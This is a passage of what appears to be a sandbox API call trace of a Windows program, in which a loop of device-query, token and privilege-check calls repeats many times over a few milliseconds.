[0084.815] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.815] GetLastError () returned 0x578 [0084.815] SetLastError (dwErrCode=0x578) [0084.815] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.815] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.815] GetCurrentThread () returned 0xfffffffe [0084.815] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.815] GetLastError () returned 0x3f0 [0084.815] GetCurrentProcess () returned 0xffffffff [0084.815] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.815] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.815] SetLastError (dwErrCode=0x522) [0084.815] CloseHandle (hObject=0x114) returned 1 [0084.815] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.815] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.815] GetLastError () returned 0x578 [0084.815] SetLastError (dwErrCode=0x578) [0084.815] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.815] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.815] GetCurrentThread () returned 0xfffffffe [0084.815] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.815] GetLastError () returned 0x3f0 [0084.815] GetCurrentProcess () returned 0xffffffff [0084.816] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.816] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.816] SetLastError (dwErrCode=0x522) [0084.816] CloseHandle (hObject=0x114) returned 1 [0084.816] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.816] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.816] GetLastError () returned 0x578 [0084.816] SetLastError (dwErrCode=0x578) [0084.816] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.816] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.816] GetCurrentThread () returned 0xfffffffe [0084.816] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.816] GetLastError () returned 0x3f0 [0084.816] GetCurrentProcess () returned 0xffffffff [0084.816] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.816] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.816] SetLastError (dwErrCode=0x522) [0084.816] CloseHandle (hObject=0x114) returned 1 [0084.816] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.816] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.816] GetLastError () returned 0x578 [0084.816] SetLastError (dwErrCode=0x578) [0084.816] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.816] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.816] GetCurrentThread () returned 0xfffffffe [0084.816] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.816] GetLastError () returned 0x3f0 [0084.816] GetCurrentProcess () returned 0xffffffff [0084.816] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.816] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.816] SetLastError (dwErrCode=0x522) [0084.816] CloseHandle (hObject=0x114) returned 1 [0084.816] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.816] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.816] GetLastError () returned 0x578 [0084.816] SetLastError (dwErrCode=0x578) [0084.816] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.816] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.816] GetCurrentThread () returned 0xfffffffe [0084.816] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.816] GetLastError () returned 0x3f0 [0084.816] GetCurrentProcess () returned 0xffffffff [0084.816] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.816] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.816] SetLastError (dwErrCode=0x522) [0084.816] CloseHandle (hObject=0x114) returned 1 [0084.816] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.817] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.817] GetLastError () returned 0x578 [0084.817] SetLastError (dwErrCode=0x578) [0084.817] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.817] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.817] GetCurrentThread () returned 0xfffffffe [0084.817] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.817] GetLastError () returned 0x3f0 [0084.817] GetCurrentProcess () returned 0xffffffff [0084.817] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.817] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.817] SetLastError (dwErrCode=0x522) [0084.817] CloseHandle (hObject=0x114) returned 1 [0084.817] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.817] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.817] GetLastError () returned 0x578 [0084.817] SetLastError (dwErrCode=0x578) [0084.817] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.817] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.817] GetCurrentThread () returned 0xfffffffe [0084.817] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.817] GetLastError () returned 0x3f0 [0084.817] GetCurrentProcess () returned 0xffffffff [0084.817] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.817] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.817] SetLastError (dwErrCode=0x522) [0084.817] CloseHandle (hObject=0x114) returned 1 [0084.817] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.817] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.817] GetLastError () returned 0x578 [0084.817] SetLastError (dwErrCode=0x578) [0084.817] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.817] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.817] GetCurrentThread () returned 0xfffffffe [0084.817] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.817] GetLastError () returned 0x3f0 [0084.817] GetCurrentProcess () returned 0xffffffff [0084.817] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.817] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.817] SetLastError (dwErrCode=0x522) [0084.817] CloseHandle (hObject=0x114) returned 1 [0084.817] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.817] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.817] GetLastError () returned 0x578 [0084.817] SetLastError (dwErrCode=0x578) [0084.817] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.817] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.818] GetCurrentThread () returned 0xfffffffe [0084.818] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.818] GetLastError () returned 0x3f0 [0084.818] GetCurrentProcess () returned 0xffffffff [0084.818] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.818] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.818] SetLastError (dwErrCode=0x522) [0084.818] CloseHandle (hObject=0x114) returned 1 [0084.818] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.818] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.818] GetLastError () returned 0x578 [0084.818] SetLastError (dwErrCode=0x578) [0084.818] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.818] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.818] GetCurrentThread () returned 0xfffffffe [0084.818] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.818] GetLastError () returned 0x3f0 [0084.818] GetCurrentProcess () returned 0xffffffff [0084.818] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.818] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.818] SetLastError (dwErrCode=0x522) [0084.818] CloseHandle (hObject=0x114) returned 1 [0084.818] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.818] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.818] GetLastError () returned 0x578 [0084.818] SetLastError (dwErrCode=0x578) [0084.818] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.818] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.818] GetCurrentThread () returned 0xfffffffe [0084.818] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.818] GetLastError () returned 0x3f0 [0084.818] GetCurrentProcess () returned 0xffffffff [0084.818] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.818] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.818] SetLastError (dwErrCode=0x522) [0084.818] CloseHandle (hObject=0x114) returned 1 [0084.818] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.818] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.818] GetLastError () returned 0x578 [0084.818] SetLastError (dwErrCode=0x578) [0084.818] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.818] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.818] GetCurrentThread () returned 0xfffffffe [0084.818] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.818] GetLastError () returned 0x3f0 [0084.818] GetCurrentProcess () returned 0xffffffff [0084.819] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.819] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.819] SetLastError (dwErrCode=0x522) [0084.819] CloseHandle (hObject=0x114) returned 1 [0084.819] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.819] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.819] GetLastError () returned 0x578 [0084.819] SetLastError (dwErrCode=0x578) [0084.819] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.819] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.819] GetCurrentThread () returned 0xfffffffe [0084.819] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.819] GetLastError () returned 0x3f0 [0084.819] GetCurrentProcess () returned 0xffffffff [0084.819] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.819] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.819] SetLastError (dwErrCode=0x522) [0084.819] CloseHandle (hObject=0x114) returned 1 [0084.819] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.819] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.819] GetLastError () returned 0x578 [0084.819] SetLastError (dwErrCode=0x578) [0084.819] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.819] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.819] GetCurrentThread () returned 0xfffffffe [0084.819] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.819] GetLastError () returned 0x3f0 [0084.819] GetCurrentProcess () returned 0xffffffff [0084.819] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.819] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.819] SetLastError (dwErrCode=0x522) [0084.819] CloseHandle (hObject=0x114) returned 1 [0084.819] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.819] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.819] GetLastError () returned 0x578 [0084.819] SetLastError (dwErrCode=0x578) [0084.819] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.819] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.819] GetCurrentThread () returned 0xfffffffe [0084.819] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.819] GetLastError () returned 0x3f0 [0084.819] GetCurrentProcess () returned 0xffffffff [0084.819] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.819] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.819] SetLastError (dwErrCode=0x522) [0084.820] CloseHandle (hObject=0x114) returned 1 [0084.820] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.820] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.820] GetLastError () returned 0x578 [0084.820] SetLastError (dwErrCode=0x578) [0084.820] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.820] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.820] GetCurrentThread () returned 0xfffffffe [0084.820] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.820] GetLastError () returned 0x3f0 [0084.820] GetCurrentProcess () returned 0xffffffff [0084.820] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.820] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.820] SetLastError (dwErrCode=0x522) [0084.820] CloseHandle (hObject=0x114) returned 1 [0084.820] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.820] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.820] GetLastError () returned 0x578 [0084.820] SetLastError (dwErrCode=0x578) [0084.820] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.820] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.820] GetCurrentThread () returned 0xfffffffe [0084.820] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.820] GetLastError () returned 0x3f0 [0084.820] GetCurrentProcess () returned 0xffffffff [0084.820] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.820] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.820] SetLastError (dwErrCode=0x522) [0084.820] CloseHandle (hObject=0x114) returned 1 [0084.820] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.820] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.820] GetLastError () returned 0x578 [0084.820] SetLastError (dwErrCode=0x578) [0084.820] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.820] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.820] GetCurrentThread () returned 0xfffffffe [0084.820] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.820] GetLastError () returned 0x3f0 [0084.820] GetCurrentProcess () returned 0xffffffff [0084.820] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.820] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.820] SetLastError (dwErrCode=0x522) [0084.820] CloseHandle (hObject=0x114) returned 1 [0084.821] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.821] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.821] GetLastError () returned 0x578 [0084.821] SetLastError (dwErrCode=0x578) [0084.821] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.821] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.821] GetCurrentThread () returned 0xfffffffe [0084.821] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.821] GetLastError () returned 0x3f0 [0084.821] GetCurrentProcess () returned 0xffffffff [0084.821] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.821] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.821] SetLastError (dwErrCode=0x522) [0084.821] CloseHandle (hObject=0x114) returned 1 [0084.821] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.821] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.821] GetLastError () returned 0x578 [0084.821] SetLastError (dwErrCode=0x578) [0084.821] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.821] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.821] GetCurrentThread () returned 0xfffffffe [0084.821] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.821] GetLastError () returned 0x3f0 [0084.821] GetCurrentProcess () returned 0xffffffff [0084.821] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.821] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.821] SetLastError (dwErrCode=0x522) [0084.821] CloseHandle (hObject=0x114) returned 1 [0084.821] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.821] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.821] GetLastError () returned 0x578 [0084.821] SetLastError (dwErrCode=0x578) [0084.821] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.821] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.821] GetCurrentThread () returned 0xfffffffe [0084.821] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.821] GetLastError () returned 0x3f0 [0084.821] GetCurrentProcess () returned 0xffffffff [0084.821] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.821] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.821] SetLastError (dwErrCode=0x522) [0084.822] CloseHandle (hObject=0x114) returned 1 [0084.822] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.822] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.822] GetLastError () returned 0x578 [0084.822] SetLastError (dwErrCode=0x578) [0084.822] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, 